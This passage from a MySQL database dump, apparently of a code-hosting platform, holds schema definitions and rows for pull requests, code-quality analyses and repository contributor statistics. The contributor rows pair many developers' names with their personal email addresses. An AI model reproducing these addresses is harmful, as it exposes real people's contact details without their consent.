PRIMARY KEY (`id`),
|
||
KEY `index_pull_request_tags_on_issue_tag_id_and_pull_request_id` (`issue_tag_id`,`pull_request_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `pull_request_tags`
|
||
--
|
||
|
||
LOCK TABLES `pull_request_tags` WRITE;
|
||
/*!40000 ALTER TABLE `pull_request_tags` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `pull_request_tags` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `pull_requests`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `pull_requests`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `pull_requests` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`pull_request_id` int(11) DEFAULT NULL,
|
||
`gpid` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`status` int(11) DEFAULT '0',
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`title` varchar(255) DEFAULT NULL,
|
||
`milestone` int(11) DEFAULT NULL,
|
||
`body` text,
|
||
`head` varchar(255) DEFAULT NULL,
|
||
`base` varchar(255) DEFAULT NULL,
|
||
`issue_id` int(11) DEFAULT NULL,
|
||
`fork_project_id` int(11) DEFAULT NULL,
|
||
`is_original` tinyint(1) DEFAULT '0',
|
||
`comments_count` int(11) DEFAULT '0' COMMENT 'number of comments for pull request',
|
||
`commits_count` int(11) DEFAULT '0' COMMENT 'number of git commits for pull request',
|
||
`files_count` int(11) DEFAULT '0' COMMENT 'number of git change files for pull request',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=89 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `pull_requests`
|
||
--
|
||
|
||
LOCK TABLES `pull_requests` WRITE;
|
||
/*!40000 ALTER TABLE `pull_requests` DISABLE KEYS */;
|
||
INSERT INTO `pull_requests` VALUES (1,1,NULL,50,'2019-10-19 09:19:51','2019-10-19 09:19:51',1,166,'eqwer',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(2,2,NULL,46,'2019-10-21 09:04:25','2019-10-23 13:59:39',2,164,'测试Pull Requests功能',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(3,NULL,NULL,46,'2019-10-21 09:06:40','2019-10-21 09:06:40',1,164,'测试Pull Requests功能',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(4,3,NULL,46,'2019-10-21 09:19:01','2019-10-21 09:30:11',2,164,'测试Pull Requests功能',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(5,4,NULL,49,'2019-10-23 09:53:45','2019-10-23 09:54:05',2,168,'第一次合并',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(6,5,NULL,46,'2019-10-23 14:15:17','2019-10-23 14:30:30',3,164,'123',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(7,6,NULL,46,'2019-10-23 15:59:45','2019-10-23 16:00:42',2,169,'测试Pull Requests功能',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(8,7,NULL,49,'2019-10-23 16:57:38','2019-10-23 17:11:57',3,169,'测试Pull Requests功能---不同用户',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(9,8,NULL,46,'2019-10-29 17:20:06','2019-10-29 17:20:06',1,178,'测试Pull Requests功能',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(10,9,NULL,61,'2019-10-29 18:05:26','2019-10-29 18:05:33',2,186,'change',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(11,10,NULL,61,'2019-10-29 18:14:16','2019-10-29 18:14:16',1,186,'123',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(12,11,NULL,61,'2019-10-29 18:42:22','2019-10-29 18:42:22',1,186,'qqq',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(13,12,NULL,61,'2019-10-29 18:45:03','2019-10-29 18:45:03',1,186,'ttt',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(14,13,NULL,46,'2019-10-31 16:23:17','2019-10-31 16:23:17',1,188,'site代码漏洞',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(15,14,NULL,46,'2019-11-07 11:22:40','2019-11-07 11:23:18',2,194,'QQ',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(16,15,NULL,46,'2019-11-07 16:24:44','2019-11-07 16:26:32',2,199,'site代码漏洞',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(17,16,NULL,46,'2019-11-08 19:54:44','2019-11-11 10:32:05',2,199,'添加注释',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(18,17,NULL,50,'2019-11-11 08:56:27','2019-11-11 08:56:27',1,202,'test',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(19,18,NULL,46,'2019-11-11 09:21:10','2019-11-11 09:21:10',1,203,'testing pull Request',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(20,19,NULL,46,'2019-11-11 09:56:52','2019-11-11 09:57:31',2,208,'aasf',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(21,20,NULL,46,'2019-11-11 10:14:42','2019-11-11 10:14:50',2,212,'爱的',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(22,21,NULL,66,'2019-11-11 10:43:01','2019-11-11 14:09:07',4,199,'test',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(23,22,NULL,64,'2019-11-11 11:06:51','2019-11-11 11:06:51',1,222,'第一次合并申请',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(24,23,NULL,48,'2019-11-11 11:14:59','2019-11-11 15:34:02',2,199,'ADD ruby file',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(25,24,NULL,66,'2019-11-11 11:19:43','2019-11-11 11:30:20',2,199,'zx',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(26,25,NULL,49,'2019-11-11 11:31:43','2019-11-11 15:34:08',2,199,'dev->devz',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(27,26,NULL,64,'2019-11-11 11:33:37','2019-11-11 11:34:38',2,199,'ada',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(28,27,NULL,64,'2019-11-11 12:51:04','2019-11-11 15:34:13',4,199,'Pull Request for merge',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(29,29,NULL,49,'2019-11-11 14:09:39','2019-11-11 14:09:42',2,199,'dev',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(30,30,NULL,64,'2019-11-11 14:13:14','2019-11-11 15:33:39',2,199,'changed count.txt for testing ',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(31,31,NULL,64,'2019-11-11 15:11:41','2019-11-11 15:12:03',2,227,'pull request',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(32,32,NULL,64,'2019-11-11 17:15:46','2019-11-11 17:15:52',2,232,'new pull request',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(33,33,NULL,59,'2019-11-13 14:41:24','2019-11-13 14:41:24',1,237,'q',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(34,34,NULL,46,'2019-11-14 17:09:07','2019-11-14 17:14:24',4,199,'测试Pull Requests功能1114',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(35,35,NULL,46,'2019-11-18 11:05:07','2019-11-18 11:10:29',2,199,'changed count',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(36,36,NULL,49,'2019-11-18 11:10:36','2019-11-18 11:10:36',1,199,'afds',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(37,37,NULL,46,'2019-11-22 12:46:03','2019-11-22 12:48:55',4,199,'limj1122',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(38,38,NULL,46,'2019-11-22 12:50:14','2019-11-22 12:50:14',1,199,'aaa',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(39,39,NULL,46,'2019-11-22 14:40:58','2019-11-22 15:05:35',2,199,'limjtesting 2019/11/22',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(40,40,NULL,49,'2019-12-30 14:58:32','2019-12-30 14:58:52',2,199,'添加新文件',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0),(41,NULL,1,46,'2020-08-13 01:05:21','2020-08-14 00:55:56',1,370,'Develop Branch for testing create by Limj',0,'测试分支合并','dev','master',142,NULL,0,0,0,0),(43,NULL,2,66,'2020-08-14 02:30:44','2020-08-14 02:31:02',1,370,'测试合并请求',0,'测试合并请求','dev','master',165,NULL,NULL,0,0,0),(44,NULL,1,1,'2020-08-18 02:46:03','2020-08-18 02:46:26',0,100,'测试文件的删除',0,'测试文件的删除\ngggggggggggggggg','bb','master',181,NULL,0,0,0,0),(45,NULL,1,49,'2020-08-20 01:54:04','2020-08-20 01:55:02',1,376,'李国宁的合并',0,'测试合并','master','master',189,379,1,0,0,0),(46,NULL,2,47,'2020-08-20 02:56:15','2020-08-21 00:31:52',1,376,'gggg',0,'请输入内容ggggg','ggg','master',190,NULL,0,0,0,0),(48,NULL,3,47,'2020-08-20 10:26:39','2020-08-20 10:26:39',0,376,'hello',0,'hello','master','ggg',193,380,1,0,0,0),(49,NULL,4,46,'2020-08-24 01:44:15','2020-08-24 01:44:15',0,376,'测试新建文件',0,'/* Hello world */\r\n','dev','master',206,NULL,0,0,0,0),(50,NULL,5,47,'2020-08-24 01:58:44','2020-08-24 01:58:45',0,376,'CreateFileForNewTestCreateFileForNewTest',0,'CreateFileForNewTestCreateFileForNewTestCreateFileForNewTest','dev_new','master',208,NULL,0,0,0,0),(51,NULL,6,47,'2020-08-24 01:59:58','2020-08-24 01:59:59',0,376,'CheckGiteaIsPresent',0,'CheckGiteaIsPresentCheckGiteaIsPresentCheckGiteaIsPresent','dev_new_2','dev_new',209,NULL,0,0,0,0),(52,NULL,1,49,'2020-10-15 00:55:34','2020-10-15 00:56:46',1,397,'添加系统描述文件',0,'','dev_lgn','master',224,NULL,0,0,0,0),(53,NULL,3,46,'2020-10-15 06:55:11','2020-10-15 06:55:11',0,370,'测试合并请求dev==》master',0,'测试合并请求dev==》master','dev','master',225,NULL,NULL,0,0,0),(54,NULL,4,46,'2020-10-16 02:06:31','2020-10-16 02:06:32',0,370,'添加Java源程序',0,'添加Java Source文件','master','dev',226,NULL,NULL,0,0,0),(75,NULL,1,155,'2021-01-22 08:12:52','2021-01-22 08:12:52',1,473,'测试',0,'测试','master','dev',250,NULL,0,0,5,1),(76,NULL,2,155,'2021-01-25 05:56:06','2021-01-25 05:56:06',0,473,'test',0,'test','dev','master',253,NULL,0,0,1,0),(77,NULL,1,122,'2021-01-26 02:15:42','2021-01-27 11:04:21',2,477,'测试合并',0,NULL,'Branch_lxc','master',254,NULL,0,0,0,0),(78,NULL,2,122,'2021-01-28 07:09:03','2021-02-09 09:18:57',2,477,'merge readme',0,'merge readme','Branch_lxc','master',256,NULL,0,0,0,0),(79,NULL,3,122,'2021-02-09 09:21:04','2021-02-09 09:21:04',0,477,'merge readme2',0,'merge readme2','Branch_lxc','master',262,NULL,0,0,0,0),(80,NULL,1,73,'2021-02-22 09:07:48','2021-02-22 09:07:48',1,494,'fork',0,'fork','master','master',266,495,1,0,1,1),(81,NULL,4,122,'2021-02-22 11:21:06','2021-02-22 11:21:06',1,477,'修改之后试一下二次pr',0,'修改之后试一下二次pr','master','master',267,481,1,0,0,0),(82,NULL,5,137,'2021-02-22 11:28:34','2021-02-22 11:28:34',0,477,'changed by cb',0,'changed by cb','master','master',268,480,1,0,0,0),(84,NULL,5,128,'2021-02-25 10:39:42','2021-02-25 10:39:50',2,430,'不能随便打字',0,'好的','master','master',270,500,1,0,0,0),(88,NULL,7,1,'2021-03-11 01:38:49','2021-03-11 01:38:49',1,376,'1',0,'1','master','dev',308,NULL,0,0,1,1);
|
||
/*!40000 ALTER TABLE `pull_requests` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `quality_analyses`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `quality_analyses`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `quality_analyses` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`author_login` varchar(255) DEFAULT NULL,
|
||
`rep_identifier` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`sonar_version` int(11) DEFAULT '0',
|
||
`path` varchar(255) DEFAULT NULL,
|
||
`branch` varchar(255) DEFAULT NULL,
|
||
`language` varchar(255) DEFAULT NULL,
|
||
`sonar_name` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `quality_analyses`
|
||
--
|
||
|
||
LOCK TABLES `quality_analyses` WRITE;
|
||
/*!40000 ALTER TABLE `quality_analyses` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `quality_analyses` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `queries`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `queries`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `queries` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`name` varchar(255) NOT NULL DEFAULT '',
|
||
`filters` text,
|
||
`user_id` int(11) NOT NULL DEFAULT '0',
|
||
`is_public` tinyint(1) NOT NULL DEFAULT '0',
|
||
`column_names` text,
|
||
`sort_criteria` text,
|
||
`group_by` varchar(255) DEFAULT NULL,
|
||
`type` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_queries_on_project_id` (`project_id`),
|
||
KEY `index_queries_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `queries`
|
||
--
|
||
|
||
LOCK TABLES `queries` WRITE;
|
||
/*!40000 ALTER TABLE `queries` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `queries` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `relative_memo_to_open_source_projects`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `relative_memo_to_open_source_projects`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `relative_memo_to_open_source_projects` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`osp_id` int(11) DEFAULT NULL,
|
||
`relative_memo_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `relative_memo_to_open_source_projects`
|
||
--
|
||
|
||
LOCK TABLES `relative_memo_to_open_source_projects` WRITE;
|
||
/*!40000 ALTER TABLE `relative_memo_to_open_source_projects` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `relative_memo_to_open_source_projects` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `relative_memos`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `relative_memos`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `relative_memos` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`osp_id` int(11) DEFAULT NULL,
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
`subject` varchar(255) NOT NULL,
|
||
`content` text NOT NULL,
|
||
`author_id` int(11) DEFAULT NULL,
|
||
`replies_count` int(11) DEFAULT '0',
|
||
`last_reply_id` int(11) DEFAULT NULL,
|
||
`lock` tinyint(1) DEFAULT '0',
|
||
`sticky` tinyint(1) DEFAULT '0',
|
||
`is_quote` tinyint(1) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`viewed_count_crawl` int(11) DEFAULT '0',
|
||
`viewed_count_local` int(11) DEFAULT '0',
|
||
`url` varchar(255) DEFAULT NULL,
|
||
`username` varchar(255) DEFAULT NULL,
|
||
`userhomeurl` varchar(255) DEFAULT NULL,
|
||
`date_collected` date DEFAULT NULL,
|
||
`topic_resource` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `relative_memos`
|
||
--
|
||
|
||
LOCK TABLES `relative_memos` WRITE;
|
||
/*!40000 ALTER TABLE `relative_memos` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `relative_memos` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `rep_statics`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `rep_statics`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `rep_statics` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`commits_num` int(11) DEFAULT NULL,
|
||
`uname` varchar(255) DEFAULT NULL,
|
||
`email` varchar(255) DEFAULT NULL,
|
||
`add` int(11) DEFAULT NULL,
|
||
`del` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`changeset` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=153 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `rep_statics`
|
||
--
|
||
|
||
LOCK TABLES `rep_statics` WRITE;
|
||
/*!40000 ALTER TABLE `rep_statics` DISABLE KEYS */;
|
||
INSERT INTO `rep_statics` VALUES (1,17,551,'Nikita','abracham.mitchell@gmail.com',29677,19311,'2018-08-03 14:44:41','2018-08-03 14:44:41',48988),(2,17,128,'Nikita Koksharov','mr_niko@inbox.ru',608,499,'2018-08-03 14:44:42','2018-08-03 14:44:42',1107),(3,17,23,'Nikita Koksharov','mrniko@users.noreply.github.com',608,499,'2018-08-03 14:44:42','2018-08-03 14:44:42',1107),(4,17,7,'Robert Elek','r@r2.io',95,27,'2018-08-03 14:44:42','2018-08-03 14:44:42',122),(5,17,5,'Nikita Koksharov','nkoksharov@redisson.org',608,499,'2018-08-03 14:44:42','2018-08-03 14:44:42',1107),(6,17,5,'Faisal Hameed','faisal.hameed@devfactory.com',60,51,'2018-08-03 14:44:42','2018-08-03 14:44:42',111),(7,17,5,'Dmitry Golovin','dgolovin@andiks.com',57,20,'2018-08-03 14:44:42','2018-08-03 14:44:42',77),(8,17,5,'Alim Akbashev','alim.akbashev@filmon.com',135,86,'2018-08-03 14:44:42','2018-08-03 14:44:42',221),(9,17,4,'Radu Cirstoiu','radu.cirstoiu@gmail.com',117,11,'2018-08-03 14:44:42','2018-08-03 14:44:42',128),(10,17,4,'Ivan Greguric Ortolan','ivan.g.ortolan@gmail.com',232,225,'2018-08-03 14:44:42','2018-08-03 14:44:42',457),(11,11,84,'Chetan Kaushik','dynamitechetan@gmail.com',NULL,NULL,'2018-08-08 09:24:58','2018-08-08 09:24:58',NULL),(12,11,68,'Varun Upadhyay','varun.u28@gmail.com',2436,2022,'2018-08-08 09:24:58','2018-08-08 09:24:58',4458),(13,11,46,'Christian Bender','christianbender89@web.de',25914,4,'2018-08-08 09:24:58','2018-08-08 09:24:58',25918),(14,11,31,'Anup Kumar Panwar','1anuppanwar@gmail.com',340,169,'2018-08-08 09:24:58','2018-08-08 09:24:58',509),(15,11,21,'nik','nikitap4.92@gmail.com',2299,1980,'2018-08-08 09:24:58','2018-08-08 09:24:58',4279),(16,11,18,'James Mc Dermott','james.mcdermott89@gmail.com',1519,1240,'2018-08-08 09:24:58','2018-08-08 09:24:58',2759),(17,11,10,'Prasoon','prasoonpandey06@gmail.com',59,14,'2018-08-08 09:24:58','2018-08-08 09:24:58',73),(18,11,10,'Deepak','deepakkumar180997@gmail.com',262,81,'2018-08-08 09:24:58','2018-08-08 09:24:58',343),(19,11,9,'Rian Gallagher','rianogallagher@gmail.com',868,225,'2018-08-08 09:24:58','2018-08-08 09:24:58',1093),(20,11,9,'Mayank Kumar Jha','mk9440@users.noreply.github.com',371,72,'2018-08-08 09:24:58','2018-08-08 09:24:58',443),(21,25,7,'adam-p','pritchard.adam@gmail.com',34,9625,'2018-08-21 17:30:58','2019-01-08 06:38:02',9659),(22,25,4,'Meng Wang','wm8120@gmail.com',46,7,'2018-08-21 17:30:58','2018-08-21 17:30:58',53),(23,25,2,'Michael Stepner','stepner@mit.edu',13,0,'2018-08-21 17:30:58','2018-08-21 17:30:58',13),(24,25,2,'engstrom','dengstr@wgu.edu',5,5,'2018-08-21 17:30:58','2018-08-21 17:30:58',10),(25,25,1,'Sherozjon','sherik1997@gmail.com',1,1,'2018-08-21 17:30:58','2018-08-21 17:30:58',2),(26,25,1,'Shen-Ta Hsieh','ibmibmibm.tw@gmail.com',433,0,'2018-08-21 17:30:58','2018-08-21 17:30:58',433),(27,25,1,'petec','pete.clark@gmail.com',1,1,'2018-08-21 17:30:58','2018-08-21 17:30:58',2),(28,25,1,'Morton Fox','github@qslw.com',1,1,'2018-08-21 17:30:58','2018-08-21 17:30:58',2),(29,25,1,'Dato Simó','dato@net.com.org.es',2,2,'2018-08-21 17:30:58','2018-08-21 17:30:58',4),(30,76,125,'Sarod Yatawatta','sarod@dop373.nfra.nl',90365,15550,'2018-11-23 15:42:15','2018-11-23 15:42:15',105915),(31,76,91,'Faruk D','f.diblen@esciencecenter.nl',3988,808,'2018-11-23 15:42:15','2018-11-23 15:42:15',4796),(32,76,76,'Hanno Spreeuw','h.spreeuw@esciencecenter.nl',135975,221683,'2018-11-23 15:42:15','2018-11-23 15:42:15',357658),(33,76,24,'Sarod Yatawatta','sarod@nirvana',90365,15550,'2018-11-23 15:42:15','2018-11-23 15:42:15',105915),(34,76,23,'Faruk D','fdiblen@users.noreply.github.com',3988,808,'2018-11-23 15:42:15','2018-11-23 15:42:15',4796),(35,76,2,'SarodYatawatta','30378342+SarodYatawatta@users.noreply.github.com',2,2,'2018-11-23 15:42:15','2019-01-13 15:40:42',4),(36,76,11,'Hanno Spreeuw','HannoSpreeuw@users.noreply.github.com',135975,221683,'2018-11-23 15:42:15','2018-11-23 15:42:15',357658),(37,76,3,'Tammo Jan Dijkema','T.J.Dijkema@gmail.com',24,22,'2018-11-23 15:42:15','2018-11-23 15:42:15',46),(38,76,1,'Gijs Molenaar','gijs@pythonic.nl',14,0,'2018-11-23 15:42:15','2018-11-23 15:42:15',14),(39,69,314,'seanyinx','sean.yin@huawei.com',44231,20214,'2018-11-24 02:35:47','2018-11-24 02:35:47',64445),(40,69,203,'Willem Jiang','jiangning9@huawei.com',59703,33587,'2018-11-24 02:35:47','2018-11-24 02:35:47',93290),(41,69,61,'cherrylzhao','zhaojunv3@126.com',12466,7344,'2018-11-24 02:35:47','2018-11-24 02:35:47',19810),(42,69,58,'Eric Lee','dagang.li@huawei.com',11354,25465,'2018-11-24 02:35:47','2018-11-24 02:35:47',36819),(43,69,45,'zhengyangyong','yangyong.zheng@huawei.com',24613,22630,'2018-11-24 02:35:47','2018-11-24 02:35:47',47243),(44,69,19,'Yang Bo','yangbo12@huawei.com',3569,21312,'2018-11-24 02:35:47','2018-11-24 02:35:47',24881),(45,69,17,'KomachiSion','263976490@qq.com',1121,133,'2018-11-24 02:35:47','2018-11-24 02:35:47',1254),(46,69,11,'Zheng Feng','zh.feng@gmail.com',1411,139,'2018-11-24 02:35:47','2018-11-24 02:35:47',1550),(47,69,11,'wuzunqian','wuzunqian@msn.com',3619,180,'2018-11-24 02:35:48','2018-11-24 02:35:48',3799),(48,69,8,'Zhen Ju','juzhen@huawei.com',160,11,'2018-11-24 02:35:48','2018-11-24 02:35:48',171),(49,64,11,'rotlogix','rotlogix@gmail.com',374,6,'2018-12-06 14:45:40','2018-12-06 14:45:40',380),(50,65,65,'Piotr Esden-Tempski','piotr@esden.net',1726,498,'2018-12-06 14:46:47','2018-12-06 14:46:47',2224),(51,65,14,'Uwe Hermann','uwe@hermann-uwe.de',110,86,'2018-12-06 14:46:47','2018-12-06 14:46:47',196),(52,65,12,'Michael Hope','michael.hope@linaro.org',205,249,'2018-12-06 14:46:47','2018-12-06 14:46:47',454),(53,65,10,'Mike Smith','DrZiplok@me.com',316,120,'2018-12-06 14:46:47','2018-12-06 14:46:47',436),(54,65,6,'revlon','jdharper@gmail.com',7,7,'2018-12-06 14:46:47','2018-12-06 14:46:47',14),(55,65,4,'Fergus Noble','fergusnoble@gmail.com',8,7,'2018-12-06 14:46:47','2018-12-06 14:46:47',15),(56,65,3,'Paul Fertser','fercerpav@gmail.com',10,6,'2018-12-06 14:46:47','2018-12-06 14:46:47',16),(57,65,2,'Piotr Esden-Tempski','esdentem@in.tum.de',1726,498,'2018-12-06 14:46:47','2018-12-06 14:46:47',2224),(58,65,2,'LM','lm@student.ethz.ch',12,9,'2018-12-06 14:46:47','2018-12-06 14:46:47',21),(59,65,2,'Geordie Bilkey','himself@thefumon.com',21,1,'2018-12-06 14:46:47','2018-12-06 14:46:47',22),(60,66,14,'Morvan Zhou','morvanzhou@gmail.com',1464,88,'2018-12-06 14:47:53','2018-12-06 14:47:53',1552),(61,28,345,'Karl Palsson','karlp@tweak.net.au',27524,21637,'2018-12-06 18:41:02','2018-12-06 18:41:02',49161),(62,28,277,'Piotr Esden-Tempski','piotr@esden.net',37758,42469,'2018-12-06 18:41:02','2018-12-06 18:41:02',80227),(63,28,276,'Uwe Hermann','uwe@hermann-uwe.de',48416,37629,'2018-12-06 18:41:02','2018-12-06 18:41:02',86045),(64,28,117,'Fergus Noble','fergusnoble@gmail.com',77049,72178,'2018-12-06 18:41:02','2018-12-06 18:41:02',149227),(65,28,98,'chrysn','chrysn@fsfe.org',10262,11694,'2018-12-06 18:41:02','2018-12-06 18:41:02',21956),(66,28,79,'Michael Ossmann','mike@ossmann.com',10185,1354,'2018-12-06 18:41:02','2018-12-06 18:41:02',11539),(67,28,64,'Karl Palsson','karlp@remake.is',27524,21637,'2018-12-06 18:41:02','2018-12-06 18:41:02',49161),(68,28,64,'BuFran','BuFran@seznam.cz',20998,8209,'2018-12-06 18:41:02','2018-12-06 18:41:02',29207),(69,28,52,'Gareth McMullin','gareth@blacksphere.co.nz',6569,2676,'2018-12-06 18:41:02','2018-12-06 18:41:02',9245),(70,28,49,'Karl Palsson','karlp@etactica.com',27524,21637,'2018-12-06 18:41:02','2018-12-06 18:41:02',49161),(71,29,55,'Jim Huang','jserv@0xlab.org',2640,56008,'2018-12-06 18:41:14','2018-12-06 18:41:14',58648),(72,29,22,'Jeff Liaw','rampant1018@gmail.com',58013,1504,'2018-12-06 18:41:14','2018-12-06 18:41:14',59517),(73,29,22,'JaredCJR','empire89090@gmail.com',4026,2530,'2018-12-06 18:41:14','2018-12-06 18:41:14',6556),(74,29,20,'Jim Huang','jserv.tw@gmail.com',2640,56008,'2018-12-06 18:41:14','2018-12-06 18:41:14',58648),(75,29,5,'yenWu','c14006078@gmail.com',48,38,'2018-12-06 18:41:14','2018-12-06 18:41:14',86),(76,29,3,'lecopzer','james455096@gmail.com',36,91,'2018-12-06 18:41:14','2018-12-06 18:41:14',127),(77,29,2,'StarNight','zack_pan@alumni.ncu.edu.tw',21,18,'2018-12-06 18:41:14','2018-12-06 18:41:14',39),(78,29,2,'Ryan Chen','ryanpatiency@gmail.com',13,3,'2018-12-06 18:41:14','2018-12-06 18:41:14',16),(79,29,1,'Kun-Hua Huang','kunhuahuang@hotmail.com',37,17,'2018-12-06 18:41:14','2018-12-06 18:41:14',54),(80,29,1,'ItsEddy','itseddy0402@gmail.com',2,1,'2018-12-06 18:41:14','2018-12-06 18:41:14',3),(81,31,2382,'Anas Nashif','anas.nashif@intel.com',430461,454920,'2018-12-06 18:41:40','2018-12-06 18:41:40',885381),(82,31,1820,'Jukka Rissanen','jukka.rissanen@linux.intel.com',292015,191559,'2018-12-06 18:41:40','2018-12-06 18:41:40',483574),(83,31,1447,'Johan Hedberg','johan.hedberg@intel.com',119606,81923,'2018-12-06 18:41:40','2018-12-06 18:41:40',201529),(84,31,1034,'Andrew Boie','andrew.p.boie@intel.com',74750,79326,'2018-12-06 18:41:40','2018-12-06 18:41:40',154076),(85,31,919,'Tomasz 